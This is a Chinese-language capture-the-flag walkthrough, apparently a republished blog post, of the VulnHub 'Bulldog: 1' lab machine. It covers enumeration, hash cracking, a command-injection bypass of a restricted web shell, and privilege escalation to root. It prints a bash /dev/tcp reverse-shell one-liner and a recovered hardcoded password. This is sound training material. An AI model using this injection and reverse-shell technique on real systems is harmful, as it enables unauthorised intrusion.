VulnHub-Bulldog: 1

admin 2024年7月4日14:52:46评论24 views字数 1853阅读6分10秒阅读模式

大余安全

一个每日分享渗透小技巧的公众号VulnHub-Bulldog: 1

大家好,这里是 大余安全 的第 49 篇文章,本公众号会每日分享攻防渗透技术给大家。

 

VulnHub-Bulldog: 1

靶机地址:https://www.vulnhub.com/entry/bulldog-1,211/

靶机难度:初级(CTF)

靶机发布日期:2017年8月28日

靶机描述:

Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don't you find out? VulnHub-Bulldog: 1

This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!

Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That's my only hint VulnHub-Bulldog: 1

Made by Nick Frichette (frichetten.com) Twitter: @frichette_n

I'd highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn't have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.

请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

 

 

VulnHub-Bulldog: 1
VulnHub-Bulldog: 1

一、信息收集

VulnHub-Bulldog: 1

 

VulnHub-Bulldog: 1

我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:

VulnHub-Bulldog: 1

我们已经找到了此次CTF目标计算机IP地址:192.168.56.140

VulnHub-Bulldog: 1

nmap发现开放了23、80、8080端口...

VulnHub-Bulldog: 1

法斗....

VulnHub-Bulldog: 1

这是说解雇了所有技术人员,因为发现被入侵了...

VulnHub-Bulldog: 1

dirb爆破发现了admin和devURL...

VulnHub-Bulldog: 1

这是一个登陆页面...admin默认密码无法登录...

sql注入也不行...

VulnHub-Bulldog: 1

意思是说APT利用了Web服务器中的一个漏洞...他们从新服务器中完全删除PHP...也不会使用PHPMyAdmin或任何其他流行的CMS系统..

VulnHub-Bulldog: 1

点进去

VulnHub-Bulldog: 1

需要服务器验证才能使用...

VulnHub-Bulldog: 1

在dev前端源码发现了MD5值...

VulnHub-Bulldog: 1

VulnHub-Bulldog: 1

等等,发现了nick/bulldog sarah/bulldoglover等...这里账号已经前面就有了,邮箱地址前面就是账号...

两个账号都能登录...

VulnHub-Bulldog: 1

这里我使用了nick/bulldog登录...无权编辑任何内容...

VulnHub-Bulldog: 1

我返回webshell发现可以使用了...应该是登录了问题

ifconfiglsechopwdcatrm

这里给了六个命令,执行别的都不行...

 

 

VulnHub-Bulldog: 1
VulnHub-Bulldog: 1

二、提权

VulnHub-Bulldog: 1

 

 

VulnHub-Bulldog: 1

ls &&echo "bash -i >& /dev/tcp/192.168.56.103/1234 0>&1" | bash

成功提shell,这里很多种玩的方法,任你们玩...

VulnHub-Bulldog: 1

发现bulldogaadmin...可以提权...

VulnHub-Bulldog: 1

find / -user bulldogadmin 2>/dev/null

第一眼看到了customPermissionApp,比较显眼...看它

VulnHub-Bulldog: 1

使用exiftool没安装...使用了strings查看...

直接获得密码:

SUPERultimatePASSWORDyouCANTget

VulnHub-Bulldog: 1

可以看到可以使用sudo...需要TTY...

VulnHub-Bulldog: 1

python提到TTY之后,提示我可以直接提权了...

成功提到root权限,并查看flag...

 

VulnHub-Bulldog: 1

比较简单的一台靶机...加油!

由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

VulnHub-Bulldog: 1

原文始发于微信公众号(大余安全):VulnHub-Bulldog: 1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日14:52:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub-Bulldog: 1https://cn-sec.com/archives/892002.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息